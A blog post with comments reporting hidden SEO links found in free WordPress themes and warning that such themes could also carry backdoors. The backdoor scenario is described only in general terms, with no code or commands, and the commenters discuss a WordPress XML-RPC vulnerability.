Some time ago, I wrote that I was planning on using a new theme for this blog. To do this, I first looked for possible candidates on themes.wordpress.net, and then started to adapt the one I liked. However, while working on the theme, I noticed hidden links in the code of the theme.
These links were hidden by using “font-size: 1px”. Hidden links are there to increase the search engine placement of the creator and his affiliates. In this case the creators were ‘wildconcepts.net‘. You can check their stats in technorati, and see they have about 250 blogs linking to them, mostly via regular credits.
Upon further examination I found two more themes by these guys, with the same hidden SEO links.
Afterwards, I checked some 20 blogs that had their themes, about half of which still had the SEO (Search Engine Optimization) links in them. Other linked urls were kianah.com (a blog) and ads-ph.com (an ad exchange service).
I reported this to themes.wordpress.net, and it seems I can no longer find the themes via their search engines. However, the themes are still available for download.
The SEO links, while being an annoyance and an underhanded thing to do, are not the main issue here. The big problem I had with this theme was, that if someone has no compunction about putting SEO links, he\they might put a backdoor there as well. I’m not saying that these guys did it, but I know that if I was a bad guy looking to make money – I’d do it.
This is a very easy way to infect servers. Just prepare a few good-looking themes for wordpress, phpbb or any other standard web-application, sit back, and watch the botnets grow. You don’t only get to infect the server, you can try to infect any client that connects to an infected server. Instead of researching a new vulnerability, just use social engineering, like you do with end users surfing the web.
You can publish your themes, and evidently, they won’t go through too much scrutiny. With an appropriate Google Alert in place – you can also be informed whenever someone new installs your theme.
This is a trust issue – and it seems that you shouldn’t trust WordPress’ theme DB. While this may seem obvious to you, it wasn’t to me at first, and I bet it isn’t obvious to many others starting their small blogs and looking for a good theme.
Was it the themes themselves, or sites being hit by this:
http://wordpress.org/development/2008/02/wordpress-233/
This was being actively exploited for several weeks, frequently from Chinese owned IP addresses, before the upgrade was available. It allows remote post modification w/o authentication via the XML-RPC interface.
The problem I’m describing is that the themes are troublesome.
The exploit you’re talking about is based on a vulnerability in xmlrpc.php, which is part of the wordpress code, not theme code.